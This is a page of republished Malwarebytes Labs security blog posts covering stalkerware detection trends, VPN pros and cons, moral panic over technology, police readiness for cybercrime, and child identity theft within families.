IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

International Women’s Day: awareness of stalkerware, monitoring, and spyware apps on the rise

Nine months ago, Malwarbytes recommitted itself to detecting invasive monitoring apps that can lead to the excessive harm of women—most commonly known as stalkerware. We pledged to raise public awareness, reach out to advocacy groups, and share samples and intelligence with other security vendors.

Now, for International Women’s Day (March 8), we decided to take measure of our efforts, examining the effects of our campaign and outreach, as well as the formation of the Coalition Against Stalkerware, of which we were a founding member. Have we actually made a difference?

As a refresher, or for those that haven’t been following along: Stalkerware and other monitoring apps can allow a user to look through someone else’s text messages, record their phone calls, turn on their phone’s cameras and microphones, rifle through their private files, peer into their search history, and track their GPS location—all without consent.

We know that stalkerware, monitoring apps, and others with spyware-like capabilities present clear potential for privacy violations. However, these apps and other Internet of Things (IoT) devices, such as smart thermostats, doorbells, and locks, have been tied to multiple cases of physical stalking, cyberstalking, and domestic violence. In fact, according to the National Domestic Violence Hotline, victims of digital abuse and harassment are two times as likely to be physically abused, two-and-a-half times as likely to be psychologically abused, and five times as likely to be sexually coerced.

While many stalkerware apps market or classify themselves as parental monitoring apps, their technical capabilities are essentially the same—sometimes on par with the level of surveillance perpetrated by nation-state actors. Worse, when put into the hands of domestic abusers, they can totally dismantle a survivor’s life, revealing their location if they’re trying to escape or uncovering their private messages if they’re attempting to discuss a safety plan.

Yet, for all its potential for emotional and physical harm, stalkerware has often been swept under the rug by many in the cybersecurity community. Most antivirus companies do not detect monitoring apps; or if they do, they use weak language indicating the threat is not as severe as malware.

That’s what caused Electric Frontier Foundation Director of Cybersecurity Eva Galperin to start calling out antivirus companies in April 2019 for better protection. And that’s why we stood up with her—to double down on what we started more than five years ago with our own stalkerware detection efforts.

Let’s take a look at how we’re doing so far. These are the numbers on stalkerware.

Stalkerware public awareness

While we have written about monitoring apps’ potential to be used for domestic abuse since 2014 (and detected those apps in our Malwarebytes for Android program), we first aimed to raise public awareness of stalkerware by publishing more than 10 articles on the topic since June 2019, including how to protect against stalkerware, what domestic abuse survivors should do if they find stalkerware on their phone, and the difficulties of pursuing legal action for stalkerware victims.

In total, our articles have been read nearly 65,000 times. The terms “stalkerware,” “stalkerware app” and “stalkerware Android” have gained a bit of momentum in Google search over the last year, showing signs of life in June 2019, the month we published our first article of the campaign. A small spike in July also coincides with our own coverage, as well as Google Play pulling seven stalkerware apps from its store. The biggest bump in overall awareness was in late October and early November 2019, when National Cyber Security and National Domestic Violence Awareness months coincided with the FTC bringing its first stalkerware case, fining app developers for violations.

Screen Shot 2020 03 08 at 9.35.44 PM
Global interest in “stalkerware” search term over 12 months, with the number 100 representing highest interest level
Screen Shot 2020 03 08 at 9.38.09 PM
The search term “stalkerware app” has been gaining steam since October 2019, seeing its heaviest spike after a concerted effort to raise awareness by the Coalition around the RSA Conference in late February 2020.

Mobile monitor and spyware categories: global detections of stalkerware

Despite the popular “stalkerware” label, Malwarebytes does not use the term to classify app detections within our product, as murky marketing techniques can often make distinguishing between stalkerware, workplace, or parental monitoring apps difficult. Instead, we look at the technical capabilities of the software and detect stalkerware apps as either belonging to the monitor category or spyware.

From March 1, 2019 to March 1, 2020, Malwarebytes detected monitor apps 55,038 times on Malwarebytes for Android user devices. During the same time period the year before, monitor apps were detected 44,116 times. That’s an increase of more than 10,000 detections in a single year. 

We must be clear: The rise in monitor detections does not automatically guarantee a rise in the use of these apps. Because Malwarebytes improved its capabilities to find monitoring apps, our detection volume did increase. We bolstered our data set independently, but also worked with other cybersecurity vendors in the Coalition Against Stalkerware to improve our results.

However, a February 2020 survey by Norton LifeLock on “online creeping” found that 49 percent of respondents admitted to “stalking” their partner or ex online without their knowledge or consent—a number that suggests a general acceptance of online stalking behavior today. Does that mean there are more developers and users of monitoring apps than there were before? We would need to conduct a meta-study and include more data points than our own telemetry to determine that truth. What we do know is that today, Malwarebytes detects 2,745 variants of monitor apps, an increase of nearly 1,000 from the year before.

Interestingly, from March 1, 2019 to March 1, 2020, Malwarebytes for Android registered 1,378 spyware detections on user devices. In the previous year, however, Malwarebytes detected spyware 2,388 times for users in the same group. In fact, although we now detect 318 variants of spyware apps for Android devices—an increase of almost 40 from the year before—our detections still decreased year over year.

The decrease in spyware detections perhaps points to something different—a decision to shy away from making and utilizing these tools. Whereas stalkerware-type apps have seen little enforcement, either from the government or from individuals and companies, spyware apps have received deeper scrutiny. Just this week, WhatsApp moved forward with its lawsuit against one major spyware developer

In looking at our data, we also discovered these threats in nearly every part of the world. Malwarebytes detected monitoring APKs in the US, India, Indonesia, the United Kingdom, Brazil, Ireland, France, Russia, Mexico, Italy, Canada, Germany, Bangladesh, Australia, and the United Arab Emirates. The US represented the largest share of detections, but admittedly, it also represents the largest share of our user base.

While our telemetry shows that monitoring apps continue to plague users everywhere, the data does not show the broader relationship between these types of apps and stalking, cyberstalking, and domestic violence.

Monitoring apps and domestic violence

According to Danielle Citron, professor of law at Boston University School of Law, monitoring apps, or what she calls “cyber stalking” apps, have been tied to multiple cases of domestic violence and abuse. As she wrote in her 2015 paper “Spying Inc.

“A woman fled her abuser who was living in Kansas. Because her abuser had installed a cyber stalking app on her phone, her abuser knew that she had moved to Elgin, Illinois. He tracked her to a shelter and then a friend’s home where he assaulted her and tried to strangle her. In another case, a woman tried to escape her abusive husband, but because he had installed a stalking app on her phone, he was able to track down her and her children. The man murdered his two children. In 2013, a California man, using a spyware app, tracked a woman to her friend’s house and assaulted her.”

Further, according to the NortonLifeLock survey, the use of stalkerware-type apps is just one of several behaviors that Americans engage in to check in on their ex and current romantic partners online.

The Online Creeping Survey, which included responses from more than 2,000 adults in the US, showed that 1 in 10 Americans admitted to using stalkerware-type apps against their ex or current romantic partners. The survey also found that 21 percent of respondents looked through a partner’s device search history without permission, and 9 percent said they created a fake social media profile to check in on an ex or current partner.

Kevin Roundy, technical director for NortonLifeLock, warned
about these behaviors.

“Some of the behaviors identified in the NortonLifeLock
Online Creeping Survey may seem harmless, but there are serious implications
when this becomes a pattern of behavior and escalates, or when stalkerware and
creepware apps get in the hands of an abusive ex or partner,” Roundy said.

As Malwarebytes reported last year, some of these behaviors are closely associated with the crimes of stalking and cyberstalking in the United States. Use of monitoring or spyware apps can create conditions in which domestic abusers can follow their partners’ GPS locations and allow them to look at their private conversations through texts and emails. For domestic abuse survivors trying to escape a dangerous situation, stalkerware can place them at an even greater risk.

Unfortunately, much of the behavior related to stalking and
cyberstalking disproportionately harms women.

According to a national report of about 13,000 interviews
conducted by the Centers for Disease Control and Prevention (CDC), an estimated
15.2 percent of women and an estimated 5.7 percent of men have been stalked in
their lifetime.

Similar data from the Bureau of Justice Statistics showed nearly the same discrepancy. In a six-month period, of more than 65,000 Americans interviewed, 2.2 percent of women reported they had been stalked, while 0.8 percent of men reported the same. 

While stalking victims include both men and women, the data
from both studies shows that women are stalked roughly 270 percent more often
than men.

What else can we do?

The stalkerware problem is tangled and complex. Makers of these types of apps often skirt government enforcement actions—with only two developers receiving federal consequences in the past six years. Users of these apps can vary from individuals who consent to being tracked to domestic abusers who never seek consent.

And the way in which these apps can be used can violate both Federal and state laws, yet, when the apps are used in conjunction with stalking and cyberstalking, the victims of these crimes often shy away from engaging with law enforcement to find help. Even if victims do work with police, they often have one priority—stopping the harm, not filing prolonged lawsuits against their stalkers or abusers.

Though this threat may appear slippery, there is much that we in the cybersecurity community can do. We can better detect these types of threats and inform users about their dangers. We can train domestic abuse advocates about device security for themselves and for the survivors they support—something Malwarebytes has already done and will continue doing. We can gather a growing coalition of partners to share intelligence and samples to collectively fight.

We can work with law enforcement on improving their own cybersecurity awareness and training, demonstrating the ways in which technology can and has been abused or developing a collaborative taxonomy for smart, efficient reporting. Finally, we can partner with domestic violence researchers to better understand what domestic abuse survivors need for digital security and protection—and then implement those changes.

We make the technology. We can make it better protect users
everywhere.

The post International Women’s Day: awareness of stalkerware, monitoring, and spyware apps on the rise appeared first on Malwarebytes Labs.

A week in security (March 2 – 8)

Last week on Malwarebytes Labs, we fired up part 1 of our series on child identity theft, asked how well law enforcement can deal with cybercriminals, and took a trip down the memory lane of moral panic. We also looked at the positives and negatives of VPNs and examined our own progress in the fight against stalkerware, spyware, and monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (March 2 – 8) appeared first on Malwarebytes Labs.

Bring your own privacy: VPNs for consumers and orgs

VPNs (virtual private networks) have been popular for quite some time now, and they’re worth a huge amount of money for the companies working in this area. They’re also at the forefront of combating potential repression and censorship around the world.

It might all sound a bit esoteric and unrelated to your general day-to-day requirements, but VPNs are absolutely a mainstream topic whether at home or in the workplace. The question nowadays probably isn’t so much “Do we need a VPN?” as “How do we get the most from the VPN we just bought?”

With that in mind, let’s cut right to the chase: We’re going to go over the pros and cons of jumping on the VPN bandwagon. With any luck, you’ll have a better idea of some of the perks and pitfalls associated with this realm.

It is, of course, worth mentioning the calculated risks taken when signing up to a VPN provider. If you’re determined to keep your data safe and your anonymity preserved, that’s great. However, that idea goes out the window if you simply sign up to the first service you come across.

VPN cons: fakes, rogues, and the long arm of the law

Please don’t fall into the trap of thinking, “I have my VPN, and now I’m a digital immortal.” There’s nothing worse than overhyping theoretical protections from all things unpleasant.

For example, 100 percent anonymity isn’t a guarantee—how can you be sure that provider X doesn’t keep logs? Is it true just because they said so? What happens if law enforcement turn up at their door with a warrant? They’re not going to get into a tussle with the law if they can help it, so it’s likely that whatever they do have, is headed in the general direction of the powers that be. This does rely heavily on where the VPN is located, so all cases are different—something to keep in mind when making a selection.

Mobile considerations

Mobile apps are incredibly popular for VPNs, with a significant chunk of younger users adopting the technology (some 70 percent of users are aged 35 or under). There are even pronounced differences in usage in the same cohort, so it’s a bad idea to guesstimate who is doing what.

Combine an unpredictable user base with countless mobile stores—some of which inadvertently play host to rogue apps—and this means unscrupulous individuals will move into the territory and try to scam people. Code injection for advertising, undisclosed data sharing, and VPNs used to attack or spam other services have all been in the news at some point, and you don’t necessarily have to be on a traditional desktop to run into these issues.

Bad ads muddy the waters

We’ve also seen examples where dubious scare tactic advertising has sent device owners to install pages for “free” VPN solutions, which themselves have some worrying statements in their terms of service. All of this before we get to the timeless scam where no VPN exists at all and they just want you to install some keyloggers.

As you can see, then, it’s bad out there—but VPNs are absolutely an advantage when it comes to keeping yourself a little more anonymous and secure online. They’re not a magic bullet, but then nothing else is either. If you’re of the mindset to explore and do a little homework before making the leap, it could be one of the stronger tools in your security/privacy arsenal.

You’ve heard the warnings; now it’s time for the measured response.

VPN pros: Securing business, helping out at home

Long gone are the days where the view was anybody using VPNs has something to hide/is up to no good. People simply want a little more privacy at home. And for businesses, it’s one more layer they can wrap around their network. If you need to make use of a remote access, business-approved VPN to be able to get on the network in the first place, it’s one more potential obstacle for attackers to get through.

Given the path of least resistance for many attacks, it could be the additional step that makes them say “too much hard work” and move on to potentially less secure targets. It’s unpleasant, but that’s how a good chunk of criminals operate: Why jump through hoops when you can walk through someone else’s front door to achieve the same result?

You don’t have to go too far back to see a steady churn of “Will my boss fire me?” missives in relation to firing up a VPN on corporate networks. An odd thing to get hung up on, considering so many workplaces will happily offer up a business-approved VPN in the first place. (You really shouldn’t be playing games on the network either way, regardless of VPN, but that’s another discussion).

Coffee shops and public Wi-Fi

Many offices are not just scattered across different regions, but also make use of decentralised employees working everywhere from living rooms to coffee shops. It stands to reason throwing a VPN into the mix is going to be beneficial in those circumstances, too. Employees on the VPN are also helping to reduce the visibility of their network traffic while out and about.

A great way to attract unwanted attention is by sitting on public Wi-Fi uploading/downloading sensitive workplace files and folders. Snoopers observing may well decide to take a more sustained interest in your business dealings, and you’ve accidentally made the entire organisation a target.

You could argue that you make yourself stand out more by overtly hiding what you’re doing in a room full of people surfing in the clear, in much the same way people making their Wi-Fi routers invisible is a large red flag. Having said that, I’d still rather lock things down while out and about versus the minuscule risk of a random person being so obsessed with you using a VPN that they make it their life’s work to take you down, instead of shrugging and  buying another coffee.

If anything, it’s probably quite reassuring for employees to know they have an additional safety blanket out on the road. When every other horror story tells us never to use airport hotspots or web cafes because someone evil is definitely going to hack you and steal your briefcase, it’s something you can give employees to even the odds.

Going undercover

One of the most common benefits of a VPN is hiding your location. If you fire up the TOR browser, for example, you can appear as though you’re in Mexico to the owner of the website you happen to be browsing, when you’re actually in Italy. Researching scam websites that only respond to mobiles? Easy: change your user agent string so it thinks you’re on an Android or iPhone.

Want to watch that show from the streaming service you’re signed up to, but it doesn’t work outside your region while on holiday? How about MMORPG gamers who get better performance from a different region’s server than their own but have no straightforward way to connect? That’s where the VPN, and its path to gamer glory, begins.

Regional reflections

Using a VPN has clear benefits for workplaces where employees travel a lot and security policies may insist on certain IP addresses/regions connecting to the network. You can’t get on the US network if you’re sitting in France, on a French network, with a French IP.

Depending on your role, you may need to access geo-locked third-party content excluding some regions but not others—if you can’t access the content, you may experience significant impact across the business. Whether people should be doing this is, of course, another discussion to be had, but there’s no point pretending people don’t do it. 

The humble VPN is here to stay

The verdict, to me, is very much in favour of VPN use. Whether you need it or not, VPNs can scale based on whether you want them for business or pleasure, and which essential tasks simply cannot be completed without one.

Like most tech tools, researched well and used correctly, it’ll be a great benefit to your day-to-day activities. Used poorly? You could end up running into one of several issues highlighted at the start of this post. The one situation you don’t need is your VPN being the kind of compromising element you were hoping to avoid in the first place.

The post Bring your own privacy: VPNs for consumers and orgs appeared first on Malwarebytes Labs.

Technology and the power of moral panic

Moral panic is a fascinating topic, and often finds itself tied up in the cutting edge-technology of the times once it works its way into the hands of younger generations. Music, games, movies—pretty much anything you can think of is liable to gatecrash the “won’t somebody think of the children?” party no matter how well-meaning or patently silly it is.

Last month, a poster was making the rounds informing parents that their children may be up to no good if they’re using forms of technology, such as virtual machines, TOR, and—uh—Discord.

Is it us or the children who are wrong? Before we explore the poster, I thought it might be interesting to wander through a couple of decades of overblown moral panic examples, where technology + teens = baffling worry. Spoiler: the children may not have been wrong after all.

1950s pelvis panic

Back in the mid 1950s, Elvis found it considerably more difficult to be a hound dog with the lower half of his body hidden from cameras. After a few appearances in full hip-swinging, pelvis-gyrating mode, TV producers decided it was all a bit too much for impressionable kids, so Elvis was turned into rock ‘n’ roll Max Headroom for one night only.

The story surrounding his legendary televisual explosion of moral panic is fascinating, as you can see from this deconstruction of what Elvis’ appearance on The Ed Sullivan Show actually entailed (spoiler: a distinct lack of Ed Sullivan…and Elvis, for that matter).

While The King’s earlier television appearances garnered much higher ratings than his extreme close-up on Sullivan’s show, the controversy is what triggers our collective memory. For better or worse, thanks to a distinct lack of Internet to capture Elvis’ full frontal for all of posterity, the historical event now boils down to “Elvis runs riot so we’d better jam the camera up his left nostril.”

1960s: a rocking good war

That’s WAR, all in caps so you know it’s definitely WAR and very serious. If broadcasting Elvis and his wildly gyrating pelvis to the world weren’t enough to send parents into a frenzy, the 1960s happened and all of a sudden, the rebellious youths decided to take to the streets in protest.

But we’re not talking about the Vietnam War, which was captured in gory detail for United States television audiences, stirring strong, sometimes violent anti-war demonstrations among younger generations. Nor are we trivializing the civil rights movement, for which TV news networks became the “chosen instrument of the revolution.” (Indeed, the revolution was televised.) Certainly both of these examples exemplify moral panic, but neither are trite.

In this case, overblown moral panic was tangled up in technology via general outrage aimed at two factions of British youth: The Mods and the Rockers. Both applied their everyday stylings to sleek, reasonably-affordable tech, such as motorbikes and mopeds. The added freedom granted by additional mobility was too much for the older generations, however.

The Mods didn’t really get on with the old guard of the Rockers, and so of course it all spiraled out into legendary riots, which may or may not have been a bit of pushing and shoving, depending on who you ask.

As with Elvis, the actual events are supplanted by fixed memories of the technology used to relay the incident or the technology used to reinforce both groups (in this case, biker gangs running riot, even if said “riot” is a little suspect).

1970s and 80s: dungeons and the occasional dragon

Wild times spanned two whole decades as Dungeons & Dragons somehow went from “cool role-playing game” to “this is a GATEWAY TO SATANISM!” The same moral outcry resulted from kids listening to heavy metal on record or cassette, with parents and lawyers arguing that an Ozzy Osbourne song made some teens kill themselves.

Evangelical groups decided that even dabbling in low tech tools and a little imagination could be a really bad thing. Youngsters thinking outside the box and making it up as they go along was enough to cause the kind of satanic panic reserved for actual Satanists.

Even as recently as 2010, you can see D&D making waves in prisons, which is pretty impressive for a game involving dice and a few bits of paper. And while 2016’s Stranger Things may have romanticized 1980s D&D playing, it’s still, interestingly enough, shown in relation to the occult. This is all, clearly, a little bit silly but nowhere as near as silly as things are about to get as we head into the 1990s.

1990s: when the cybers boil over

Early ’90s tech—besides its briefcase-sized car phones, fax machines, and dot matrix printers—was mostly characterised by the emergence of cybery things online. Cyberpunk, hacking, and the newfangled world of the world wide web generally provided massive opportunities for kids to realise their creativity. At the same time, lots of parents were sent into a panic about their kids spending all hours in front of the screen, messaging strangers in AOL group chats.

Steve Jackson Games, who made games ON computers but designed them FOR pen and paper, made extensive use of technology and also ran a bulletin board system (BBS) focused on all sorts of sci-fi/tech/fantasy topics with the (possibly unfortunate) name Illuminati BBS.

In the first week of March, 1990, the US Secret Service raided the office of SJG, along with the home of one of its employees, in one of the most famous raids of all time. Before we go any further, here’s a myth-busting list about the raid, which will immediately set straight some fact from fiction.

Read that? Good. Amongst the files and computers taken was GURPS Cyberpunk, and this went about as badly as you might think in the middle of a suspected computer crime raid. Law enforcement were apparently so baffled by this strange new world of innovation that they thought it was a “handbook for computer crime.” As one does.

The story dragged on for some time and nearly put SJG out of business, which is remarkable when you think about the severity of the actions taken versus the absolute nothing burger inside the SJG offices. Don’t worry, though, I’m sure things will be much more sensible as the 2000s progress.

2000s to present day: games, games, games

You probably know what’s coming, but the gradual ramp-up in computing technology takes aspects of previously-discussed moral panic and puts them in a blender, firing out at least 20 years worth of “video games will make your kids stupid/violent/unable to focus/generally altogether evil/ruined forever.” In fact, there’s a splash of moral panic pretty much anywhere teens and technology intersect today.

In cinema, many censorship laws were somewhat relaxed leading to unedited, full editions of older films being released. The spectre of so-called video nasties from the 1980s lived once more, leading to yet more worried expressions as older teens wandered off to cinemas. 

Music? Got you covered. Games? You better believe we’ve got you covered. Games are possibly the apex predator in terms of being blamed for society’s ill’s, because with games you can pretty much conjure up anything you can think of.

Well, perhaps not the only apex predator. Time to go back to the start of this blog and take a look at this controversial poster all over the news.

2020: poster panic

The poster in question was produced by the West Midlands Regional Crime Unit, and is one of those “What’s on your child’s computer?” efforts, which seems to come around every so often. If you see one of the tools on the list, you’re supposed to wonder if Little Jimmy has been breaking into banks every evening instead of 360 degree no-scoping a 38-year-old.

The problem is, it’s all a bit silly and outdated.

Anyone who’s been into a school anytime in the last few years should be fully aware that technology is a big driver of lessons. I have relatives whose kids regularly ask me about security because it’s quite literally part of their lessons.

Questions about password usage, security tips, ways bad people try to trick you, the tools they use, and the ways you can protect yourself all factor in. Unlike a decade or so ago in many locations, there are actual degrees that contain actual Internet security modules. I regularly go into universities and give talks on infosec for students soon to graduate. A lot of the time they have better technical knowledge than me in specific areas, and I’d be surprised if they didn’t.

I’ve personally been asked about TOR, Kali Linux, and Virtual Machines by another younger relative with an interest in computers. Am I suddenly reaching for the telephone because I think they’re about to hack the planet? Of course not.

Many, many people work in technology with a lot of these tools for reasons utterly unrelated to security. Virtual machines are not the exclusive preserve of getting up to no good, and it’s odd to think folks out there might only consider them in these terms.

Possibly the most baffling inclusion on the poster is Discord, a chat app massively popular in gaming and streaming circles because it’s “a popular communication platform often used to share hacking tips.” I mean, you may as well say “…and so is any other technology that’s ever been rolled out for distribution.” It’s such a wide-ranging, over-generalising sweep of a statement, I can only just about process it.

My advice is to take an interest in your children’s technology dabbling because it’s now an integral, massively important part of their daily learning experience and not because they’re about to go off and blow up a power station. This importance will only increase over time, so by all means invest in some security and hacking books and maybe even an old copy of GURPS Cyberpunk.

You may even get a kick out of it yourself.

The post Technology and the power of moral panic appeared first on Malwarebytes Labs.

Are our police forces equipped to deal with modern cybercrimes?

“You should have asked for the presence of a digital detective,” Karen said when I told her what happened at the police station. I had accompanied a neighbor, who is a small business owner, that had been hit with ransomware and wanted to file a report. After listening to his story, the police officer at the desk asked if my neighbor had a description of the perpetrator. I may have groaned.

This wasn’t the first time I was disappointed by the lack of technical knowledge of the police. I had filed an online report about a sextortion scam months earlier and received a reply that said: “If you haven’t paid, you can delete the mail. If you did pay, we can handle your report.”

My offer to send them the full source of the email fell on deaf ears. No attempt was made to initiate a take-down or explain why deleting the email was enough. I happen to know how this works, but other victims might not know that sextortion emails are just bluffing. What’s to stop them from paying in the future?

Knowing how to report cybercrimes

Karen is a former Dutch police officer, and she knew that for reporting cybercrimes, there are police officers that have special training, the so-called “digital detectives.” In the Netherlands, they are officially called digital experts. I could have avoided disappointment if I had known the proper procedure to reach a digital expert.

In the United States, there may be an officer assigned to cyber, but in most precincts, it’s the person who happens to be on desk duty or the person who uses technology the most. The situation is even more dire at the local level.

For the ransomware case, we should have made an appointment and specifically asked for a digital expert to be present because we wanted to report a cybercrime. And online cybercrime reports are only possible in common cases, such as Microsoft tech support scams. They have standard forms you can fill out and submit.

While the experience was frustrating, it made me realize that police officers are not trained for expertise in all the new cybercrimes that have surfaced over the last few years. Comparing these individual experiences to the stories we read about elite police cyber units like Interpol, FBI, and the Dutch Team High Tech Crime, I realized the situation in local districts is much different from those highly specialized, national teams. Here’s what I learned after some digging around.

Cyber training

When asked, the Dutch police informed me that they have special training courses for digital experts, just like they have experts for drug-related crimes and financial experts. The digital experts can receive training in forensics, hacking, threat hunting, hardware access, reverse engineering, digital tracing, and network analysis. All these trained experts provide assistance in cases where their expert knowledge is advantageous.

In the UK, they seem to be one step ahead. Every police force now has a cybercrime unit, which will investigate and pursue offenders, help businesses and victims protect themselves from attack, and prevent vulnerable individuals to become cybercriminals. Of course, we know the US, where cybercrime is most common, only has a dedicated cyber team with the FBI. While there are FBI offices around the country, they aren’t present at every police station.

This shows us that different countries have their digital detectives organized in different ways. And it is good to be aware of their existence and the best procedure in your location to get their help if you need it.

International cooperation against cybercrime

One of the obvious difficulties in apprehending criminals that have defrauded people or organizations in your own country is that the criminal is likely to be across a few borders. And sometimes, the criminals are protected by a regime that is likely to turn a blind eye as long as the criminals only operate abroad.

International cooperation as we have seen in the take-over of dark web marketplaces, is not only important when it comes to crime fighting, but can also be of great value in cyberwar. There is already enough evidence of state-sponsored attacks on critical infrastructure, and it is important to know what these enemy forces are up to and capable off.

Sometimes, there are more effective ways to cripple an international gang of cybercriminals than to try and arrest them. One example is the No More Ransom initiative, where decryption keys for certain ransomware families are published. This brings down the income of the cybercriminal, and with that, it hopefully takes away their incentive to proceed on the path of crime.

Cyberbullying

The Internet and social media have introduced some forms of bullying that arguably might benefit from police involvement. Where in older times you might say, “Sticks and stones may break my bones, but words will never hurt me,” modern-day cyberbullying has a bigger, long-range impact. Someone posting compromising pictures or movies on social media can be hurtful for a long time.

Social media platforms are slow to respond to take-down requests, and a little pressure from the authorities might expedite their actions. Victims of cyberbullying, however, tend to receive little to no help from the authorities.

Investing in police skills

To meet a growing demand for specialized experts, the police force will need a good deal of extra funds and staff. The cost of failing to adequately meet these demands may result in heavier losses than society can afford. So even if we feel that we cannot free up the funds for these measures, consider that organizations, consumers, and governments may be handing out the same amount to cybercriminals, the equivalent of throwing money into a bottomless pit. In addition, the costs of recovering from cyberattacks are far higher than what we might pay in training.

digital expert
A digital expert has to have knowledge about many fields

Digital experts can also be a useful asset when it comes to solving non-cybercrimes. In many cases, digital evidence may help the police locate criminals, view criminal activity around a home or business, or prove criminal intent.

For example, digital evidence might help place people and events within time and space to establish causality for criminal incidents. But collecting and submitting digital evidence legally requires different tools and processes from doing so for physical evidence, so a trained expert will be able to extract more evidence from the same device(s). They can do so not only by knowing where to look, but also by having the knowledge of how to handle a device so that no evidence gets destroyed.

Recommendations

At least every police station or sheriff’s office should have one digital expert available to at least take in reports of cybercrimes. These experts will know which information is needed to have a chance of apprehending the criminal, can advise the victim on how to proceed, and maybe help prevent them from becoming a victim again.

If this is not an achievable goal, set up
an easy-to-use site to report cybercrimes online, where a special department of
digital experts can do a triage, spot trends, and involve other departments
where that is beneficial.

International cooperation will become even more important if we want to stand a chance against cybercriminals, whether they are organized in groups or groups of individuals that buy malware-as-a-service on the dark web.

The International Code of Conduct for Information Security is an international effort to develop behavioral norms in the digital space, submitted to the UN General Assembly in 2011 and in revised form in 2015. This code should be worked out in more detail and allow for international cooperation against cybercrime. And diplomatic efforts should be made to get this code ratified by more UN members.

Stay safe, everyone!

Special thanks to the Department of
Communication of the Dutch Police Academy and the Media Desk of the Rotterdam
police department.

The post Are our police forces equipped to deal with modern cybercrimes? appeared first on Malwarebytes Labs.

Child identity theft, part 1: On familiar fraud

In 2013, 30-year-old Axton Betz-Hamilton received an angry phone call from her father two weeks after her mother, Pam, died.

“What the hell were you thinking?” he screamed. He had just unearthed a credit card statement in her name that had run over its limit from a box of her mother’s paperwork.

Betz-Hamilton reasoned that the statement must be from one of the credit cards taken out by her identity thief, who had been using her Social Security number (SSN) since she was only 11. She wondered what the statement was doing in her mother’s possession.

“I don’t know,” her father had said, “but it’s here in this file folder, along with your birth certificate.” At that moment, Betz-Hamilton knew she had found the elusive identity thief who destroyed her life and put her father and long-dead grandfather into severe debt. Her own mom.


Identity theft is a genuine problem that strikes fear in most adults. For parents or guardians of children under the age of 18, however, the thought may not come to mind. However, child identity theft does happen, and this type of fraud is, frighteningly, becoming more common.

Child identity theft, also known as child identity fraud, usually occurs when someone takes a minor’s personally identifiable information (PII) and other data. At the top of the list is the Social Security Number (SSN), which parents usually receive as soon as their child is born. Other data that can be swiped are children’s names, physical addresses, dates of birth, and social media credentials.

A study by Javelin Strategy & Research revealed that, overall, more than 1 million US children had their identities stolen in 2017.

Having a child’s identity stolen is not that different from stealing an adult’s identity. In most cases, minors’ data is leaked through data breaches. Sometimes, parents inadvertently give away their child’s data, not knowing that they can choose to mostly withhold it.

Take, for example, a mother who fills out forms at the doctor’s office. Although many healthcare providers ask for an SSN, it is not always required. Instead, the Federal Trade Commission (FTC) advises parents and guardians to provide an alternative form of identification. Or they can also only give out the last four digits of the child’s SSN.

Child identity fraud has also been linked with cyberbullying. The 2018 Child Identity Fraud Study found that both bullying and fraud arise from the same vulnerabilities in a child: the tendency to overshare personal information online.

“Children who are unprepared to protect themselves from online risks are likely to encounter individuals who wish to target them emotionally or financially,” said Al Pascual, Senior Vice President, Research and Head of Fraud & Security at Javelin Strategy & Research. “Bullied children may be more vulnerable to fraud as they are taken advantage of when they seek friendship online.”

Minors who are cyberbullied are at least nine times more likely to be victimized by fraudsters compared to those who aren’t bullied. But another emerging trend in child identity theft establishes an even more worrying trend: What happens when the very people children should trust with their information are the ones abusing it?

What is familiar fraud?

While we usually connote adult identity theft with anonymous scammers, child identity theft may not always be conducted by the faceless, hooded hacker we see in stock photos and crime dramas.

Javelin Strategy & Research’s 2018 study found that 60 percent of child identity fraud victims personally know their thief. Known scammers range from the child’s parent, relative, or family friend to a hired caretaker or teacher. This is called familiar fraud.

Familiar fraud is a type of fraud wherein family members are found out as perpetrators of identity theft within the family. It’s a husband stealing his wife’s identity, aunties stealing their niece’s identity, one sibling after another’s, or—in Betz-Hamilton’s case—a parent stealing their child’s, partner’s, and father’s identities.

Sometimes, fraud is also considered “familiar” in nature if it is perpetrated by someone who is close to the family but not blood relatives. This could be friends, neighbors, or even coworkers.

Unlike other fraud, familiar fraud isn’t always conducted with an intent to harm. Sometimes, parents steal and use their child’s identity to subscribe to services, giving the reason that the child benefits from these services as well. However, according to Robert P. Chappell Jr., law enforcement veteran and author of the book Child Identity Theft: What Every Parent Needs to Know, this justification is a stretch.


Recommended reading: What is identity fraud?


There are several motivations behind identity thieves within the family. A parent or relative might be acting out of desperation, such as wanting to receive healthcare benefits but being unable to apply because they struggle with bad credit. At times, it is suggested, such relatives couldn’t help it due to psychiatric and psychological issues. Let us also not discount plain old greed.

Familiar fraudsters often keep the fraud going for as long as they can. Since they usually know their victim enough to pose as them and have ready access to mail with sensitive information—thus making familiar fraud another form of crime of opportunity—they can easily access accounts and even open new ones under their victim’s name.

When familiar fraud is brought to light, victims are forced to make a difficult decision: file a report against a family member or stay in debt. Sadly, victims tend to go for the latter. They are reluctant to file a report against their familial identity thief or cooperate with fraud investigations as they don’t want to get them in trouble despite of the trouble this has caused them. They also do this to avoid family backlash, drama, and to preserve family relationships.

If victims do take action on the familiar fraud, they don’t often get support from other family members as they find it unfathomable for a relative to be perpetrators of fraud against another relative.

If familiar fraud victims are willing to give their relative thief a pass, they are only putting themselves at a disadvantage. This is because it limits them from the available options, they can take to address the problem, which is their sullied identities due to poor credit. No police report or fraud investigation could also mean that lenders would be less inclined to consider their debt as fraudulent.

What are the repercussions of child identity theft within the family?

Effects of fraud, in general, could be immediate and
long-lasting. But familiar fraud drags a lot more with it. It can go beyond
merely going out of pocket fighting the problem (although this is a significant
one). Familiar fraud deeply affects victims mentally, emotionally, and
sometimes physically.

Apart from a wrecked credit, child victims of identity theft may find it difficult to believe that someone they fully trust, such as a parent, could harm them this way by letting them pay for their bad debts. This leads to emotional and psychological trauma. They may feel violated, betrayed, and guilty. In a study, Experian found that adults who had been child fraud victims reported feeling stressed, angered, and concerned. The experience also affected their feelings of self-worth, thus tending to feel suicidal.

Not only that: the physical well-being of identity fraud victims may manifest signs of struggle from the ordeal. In a 2017 Identity Theft: The Aftermath report [PDF], the Identity Theft Resource Center (ITRC) reported that stress (64.3 percent) topped the list. This is followed by loss of concentration or focus (37.1 percent); fatigue (35 percent); aches, pains, stomach issues, heart palpitations, and sweating (23.1 percent); sleep disturbances (48.3 percent); and an inability to work due to these physical symptoms (28.7 percent). This is why a number of victims usually seek the help of professionals to deal with their trauma.


In part 2 of this blog series, we’ll be touching on signs that your child’s identity may have been compromised, the digital footprints parents leave behind for their kids and the correlation to fraud, and how parents can reclaim their child’s identity.

